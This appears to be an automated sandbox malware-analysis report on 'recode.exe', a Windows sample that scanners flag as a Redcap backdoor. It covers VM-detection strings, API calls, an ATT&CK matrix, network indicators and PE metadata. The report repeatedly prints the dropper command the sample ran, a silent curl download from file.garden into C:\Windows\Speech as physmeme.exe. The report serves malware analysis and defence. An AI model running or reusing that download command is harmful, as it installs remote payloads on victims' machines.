    Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.0.drBinary or memory string: vmci.sys
    Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.0.drBinary or memory string: VMware20,1
    Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: recode.exe, 00000000.00000002.3857939559.000001D921FCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
    Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805DCA8 memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF75805DCA8
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805DCA8 memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF75805DCA8
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758031B60 QueryPerformanceFrequency,QueryPerformanceCounter,LoadLibraryA,GetProcAddress,GetProcAddress,0_2_00007FF758031B60
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805E9C4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF75805E9C4
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758048650 powf,powf,powf,sqrtf,sqrtf,sqrt,tanf,tanf,strstr,strstr,DeviceIoControl,mouse_event,mouse_event,GetAsyncKeyState,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,powf,sqrtf,GetAsyncKeyState,SystemParametersInfoW,SystemParametersInfoW,DeviceIoControl,0_2_00007FF758048650
    Source: C:\Users\user\Desktop\recode.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
    Source: C:\Users\user\Desktop\recode.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
    Source: C:\Users\user\Desktop\recode.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF75805FAA8
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805F900 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF75805F900
    Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    21
    Input Capture
    1
    System Time Discovery
    Remote Services21
    Input Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    11
    Process Injection
    LSASS Memory31
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    3
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Obfuscated Files or Information
    Security Account Manager2
    File and Directory Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading
    NTDS12
    System Information Discovery
    Distributed Component Object ModelInput Capture4
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590000 Sample: recode.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 76 27 file.garden 2->27 31 Antivirus / Scanner detection for submitted sample 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected BlockedWebSite 2->35 37 2 other signatures 2->37 8 recode.exe 2 2->8         started        signatures3 process4 process5 10 cmd.exe 1 8->10         started        12 conhost.exe 8->12         started        14 cmd.exe 1 8->14         started        process6 16 curl.exe 2 10->16         started        dnsIp7 23 file.garden 104.21.16.1, 443, 49708 CLOUDFLARENETUS United States 16->23 25 127.0.0.1 unknown unknown 16->25 21 C:\Windows\Speech\physmeme.exe, HTML 16->21 dropped 29 Creates HTML files with .exe extension (expired dropper behavior) 16->29 file8 signatures9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    recode.exe58%ReversingLabsWin64.Backdoor.Redcap
    recode.exe63%VirustotalBrowse
    recode.exe100%AviraBDS/Redcap.vfmww
    recode.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.josbuivenga.demon.nl0%Avira URL Cloudsafe
    http://fontello.comCopyright0%Avira URL Cloudsafe
    http://www.josbuivenga.demon.nlMuseo0%Avira URL Cloudsafe
    http://www.josbuivenga.demon.nlCopyright0%Avira URL Cloudsafe
    https://fontawesome.comhttps://fontawesome.comFont0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    file.garden
    104.21.16.1
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.josbuivenga.demon.nlMuseorecode.exefalse
        • Avira URL Cloud: safe
        unknown
        https://fontawesome.comrecode.exefalse
          high
          https://www.cloudflare.com/learning/access-management/phishing-attack/curl.exe, 00000004.00000003.1417929801.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417827747.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417996395.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418053562.000001CBB3461000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.4.drfalse
            high
            http://www.josbuivenga.demon.nlrecode.exefalse
            • Avira URL Cloud: safe
            unknown
            http://fontello.comCopyrightrecode.exefalse
            • Avira URL Cloud: safe
            unknown
            http://fontello.comrecode.exefalse
              high
              http://www.josbuivenga.demon.nlCopyrightrecode.exefalse
              • Avira URL Cloud: safe
              unknown
              https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin--outputC:curl.exe, 00000004.00000002.1422090928.000001CBB3440000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binCcurl.exe, 00000004.00000002.1422212842.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418751823.000001CBB3479000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418821905.000001CBB347A000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://upx.sf.netAmcache.hve.0.drfalse
                    high
                    https://fontawesome.comhttps://fontawesome.comFontrecode.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binNcurl.exe, 00000004.00000003.1418950817.000001CBB3456000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418861005.000001CBB3453000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binncurl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.cloudflare.com/5xx-error-landingcurl.exe, 00000004.00000003.1417827747.000001CBB34A5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417929801.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417929801.000001CBB34A5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417827747.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417996395.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418053562.000001CBB3461000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.4.drfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.16.1
                          file.gardenUnited States
                          13335CLOUDFLARENETUSfalse
                          IP
                          127.0.0.1
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1590000
                          Start date and time:2025-01-13 13:15:12 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:recode.exe
                          Detection:MAL
                          Classification:mal76.phis.winEXE@9/2@1/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240s for sample files taking high CPU consumption
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 4.175.87.197
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.21.16.1MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                          • www.mzkd6gp5.top/3u0p/
                          1001-13.exeGet hashmaliciousFormBookBrowse
                          • www.mzkd6gp5.top/utww/
                          trow.exeGet hashmaliciousUnknownBrowse
                          • www.wifi4all.nl/
                          8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                          • www.rafconstrutora.online/0xli/
                          NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                          • www.kkpmoneysocial.top/86am/
                          JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          file.gardenHdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 188.114.96.3
                          NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 188.114.96.3
                          4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 188.114.96.3
                          UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 188.114.97.3
                          4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 188.114.96.3
                          seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 188.114.96.3
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSRFQ PC25-1301 Product Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                          • 104.21.80.156
                          QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 104.21.112.1
                          Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                          • 104.21.32.1
                          SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                          • 104.21.112.1
                          https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20linkGet hashmaliciousUnknownBrowse
                          • 104.19.132.76
                          PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 104.21.32.1
                          https://smartbooking.ma/Get hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 104.21.80.1
                          https://connexion-pro.support/adobe/s/assets/Get hashmaliciousUnknownBrowse
                          • 104.21.11.138
                          rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.74.152
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          74954a0c86284d0d6e1c4efefe92b521gem2.exeGet hashmaliciousUnknownBrowse
                          • 104.21.16.1
                          gem1.exeGet hashmaliciousUnknownBrowse
                          • 104.21.16.1
                          tiko-ifyzit-srdh.vbsGet hashmaliciousUnknownBrowse
                          • 104.21.16.1
                          Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                          • 104.21.16.1
                          dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                          • 104.21.16.1
                          Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                          • 104.21.16.1
                          Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                          • 104.21.16.1
                          58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                          • 104.21.16.1
                          676556be12ac3.vbsGet hashmaliciousMint StealerBrowse
                          • 104.21.16.1
                          PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htaGet hashmaliciousMint StealerBrowse
                          • 104.21.16.1
                          No context
                          Process:C:\Windows\System32\curl.exe
                          File Type:HTML document, ASCII text, with very long lines (394)
                          Category:dropped
                          Size (bytes):4571
                          Entropy (8bit):5.054919966848219
                          Encrypted:false
                          SSDEEP:96:1j9jwIjYjUDK/D5DMF+BOiUAtEZLmmmrR89PaQxJbGD:1j9jhjYjIK/Vo+trEZ6mmre9ieJGD
                          MD5:65472652D391E54A8DF8C71B6D3D6BD4
                          SHA1:282128F61E7C070AAA7C4804A3A41177F31CC30D
                          SHA-256:C44D35E38FA3DA9596786F900CC3DAAA2B6653BE475AFF92C4946163965BA6E8
                          SHA-512:7D829D309D248B30747F7E7C4EC5111A91D3F40DEF7D7B9746ED5CD56A6AA305D0A30886AFE51F3B975CED777C5991552E213820DD54FAC10F3D29A20B912249
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_BlockedWebSite, Description: Yara detected BlockedWebSite, Source: C:\Windows\Speech\physmeme.exe, Author: Joe Security
                          Reputation:low
                          Preview:<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded
                          Process:C:\Users\user\Desktop\recode.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.369393853418397
                          Encrypted:false
                          SSDEEP:6144:AFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:YV1QyWWI/glMM6kF7/q
                          MD5:AF6790CFE636257DBE25FA583DAAE80D
                          SHA1:0AF988263CF2D9E70C347B2E51DA9CD8A9839091
                          SHA-256:C800B345010953840F801D53A3A26A70ECA1CDB312C0BDE606B034D3CBF0C8CC
                          SHA-512:9864969F41992DE2ED1E49CB74C397DCC4997C143FA6B88B1E7BD94B68ED07616FA4E177FC9A12BF58A3BEBD2BCE6043C5F57F70CA574DD8357772D65FDC0862
                          Malicious:false
                          Reputation:low
                          Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....e..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32+ executable (console) x86-64, for MS Windows
                          Entropy (8bit):6.995363521249757
                          TrID:
                          • Win64 Executable Console (202006/5) 92.65%
                          • Win64 Executable (generic) (12005/4) 5.51%
                          • Generic Win/DOS Executable (2004/3) 0.92%
                          • DOS Executable Generic (2002/1) 0.92%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:recode.exe
                          File size:890'368 bytes
                          MD5:0023578e24d6ed38daf9c364137a8929
                          SHA1:8f99599b5ee81e2b2401a3ef7eb17026780a1bd9
                          SHA256:ff717b5311c7d23838e0f7c9f06d8967b43626dfcababc329386851e6e6d9cb3
                          SHA512:80536311b27688e9d86319d876ac2c04d446492dc56a7f74599075818f3ebb845558dd7141813eb8c9b06eb89a948cbba17b68fde1dfad29dd3716573cfd22c2
                          SSDEEP:12288:TFSfPUBEpY8XzBBFKzNAdDrnQUxCj2AqeMQm96TnSEl1yt6zzng0LKFdym2jO+AB:TFsPc41vKz2rnQuGKFGRop
                          TLSH:A115C08EB1AF49E9D062E17D5AD67213F671390817102BE3BBC4445C37E76D86AF8E02
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v....|..v.......v.......v.......v.......v.......v.......v.......v.......v...v...w.......v.......v.......v..Rich.v.
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x14005e9b0
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows cui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66E890FC [Mon Sep 16 20:11:40 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:b4739d47e366c5fdac6bcebcee22b298
                          Instruction
                          dec eax
                          sub esp, 28h
                          call 00007F5824EDA4CCh
                          dec eax
                          add esp, 28h
                          jmp 00007F5824ED93F7h
                          int3
                          int3
                          inc eax
                          push ebx
                          dec eax
                          sub esp, 20h
                          dec eax
                          mov ebx, ecx
                          xor ecx, ecx
                          call dword ptr [00003753h]
                          dec eax
                          mov ecx, ebx
                          call dword ptr [00003742h]
                          call dword ptr [0000374Ch]
                          dec eax
                          mov ecx, eax
                          mov edx, C0000409h
                          dec eax
                          add esp, 20h
                          pop ebx
                          dec eax
                          jmp dword ptr [00003740h]
                          dec eax
                          mov dword ptr [esp+08h], ecx
                          dec eax
                          sub esp, 38h
                          mov ecx, 00000017h
                          call dword ptr [00003734h]
                          test eax, eax
                          je 00007F5824ED9589h
                          mov ecx, 00000002h
                          int 29h
                          dec eax
                          lea ecx, dword ptr [000791D2h]
                          call 00007F5824ED962Eh
                          dec eax
                          mov eax, dword ptr [esp+38h]
                          dec eax
                          mov dword ptr [000792B9h], eax
                          dec eax
                          lea eax, dword ptr [esp+38h]
                          dec eax
                          add eax, 08h
                          dec eax
                          mov dword ptr [00079249h], eax
                          dec eax
                          mov eax, dword ptr [000792A2h]
                          dec eax
                          mov dword ptr [00079113h], eax
                          dec eax
                          mov eax, dword ptr [esp+40h]
                          dec eax
                          mov dword ptr [00079217h], eax
                          mov dword ptr [000790EDh], C0000409h
                          mov dword ptr [000790E7h], 00000001h
                          mov dword ptr [000790F1h], 00000001h
                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc0f600x190.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xde0000x1e8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xd90000x39c0.pdata
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xdf0000x350.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0xba4b00x70.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0xba5800x28.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xba3700x140.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x620000x5d8.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x6016f0x60200c7b0126e28080e37732361bc1b3147adFalse0.48006999756176855data6.536362421256434IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x620000x604340x60600839e369b65d550a7c64e03af8369a968False0.6223679677367056data6.716633658693276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xc30000x151000x1480044746906914cb52981b2b71c1e495bb0False0.5246403391768293data7.013222736385388IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .pdata0xd90000x39c00x3a00628f7c8bd6967fea3ae3b8e6c24ca0b4False0.4816810344827586data5.788334614762561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          _RDATA0xdd0000x1d00x20090c1a4c095bdcd0bd7c466f09ff97faaFalse0.37890625data4.523192804901079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0xde0000x1e80x200babcd7d58124e853f8251c367ae2737cFalse0.54296875data4.762595083624659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xdf0000x3500x4004b5efc1c841dec2c8131657213df732fFalse0.482421875data4.755177466104086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0xde0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                          DLLImport
                          d3d11.dllD3D11CreateDeviceAndSwapChain
                          dwmapi.dllDwmExtendFrameIntoClientArea
                          ntdll.dllRtlLookupFunctionEntry, RtlVirtualUnwind, RtlCaptureContext
                          KERNEL32.dllGlobalLock, GlobalFree, MultiByteToWideChar, WideCharToMultiByte, QueryPerformanceCounter, QueryPerformanceFrequency, FreeLibrary, GetProcAddress, LoadLibraryA, CreateFileA, CreateFileW, CloseHandle, GetLastError, DeviceIoControl, InitializeCriticalSectionEx, DeleteCriticalSection, CreateEventW, CreateThread, lstrcmpiA, GetConsoleWindow, CreateToolhelp32Snapshot, Process32First, Process32Next, IsDebuggerPresent, OutputDebugStringW, ReleaseSRWLockExclusive, GlobalAlloc, WakeAllConditionVariable, SleepConditionVariableSRW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, Sleep, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GlobalUnlock, GetFileInformationByHandleEx, AcquireSRWLockExclusive
                          USER32.dllSetClipboardData, GetClipboardData, EmptyClipboard, CloseClipboard, OpenClipboard, GetKeyState, GetForegroundWindow, SystemParametersInfoW, GetWindowLongA, MessageBoxA, GetSystemMetrics, mouse_event, GetAsyncKeyState, DestroyWindow, DispatchMessageA, LoadCursorA, ScreenToClient, ClientToScreen, GetCursorPos, SetCursor, SetCursorPos, GetClientRect
                          IMM32.dllImmSetCandidateWindow, ImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
                          D3DCOMPILER_47.dllD3DCompile
                          MSVCP140.dll?_Throw_Cpp_error@std@@YAXH@Z, ?_Winerror_map@std@@YAHH@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Thrd_detach, _Query_perf_counter, ?_Xlength_error@std@@YAXPEBD@Z, _Query_perf_frequency
                          VCRUNTIME140.dll__std_terminate, strstr, memchr, __current_exception_context, __current_exception, __C_specific_handler, wcsstr, _CxxThrowException, __std_exception_destroy, __std_exception_copy, memcmp, memset, memmove, memcpy
                          VCRUNTIME140_1.dll__CxxFrameHandler4
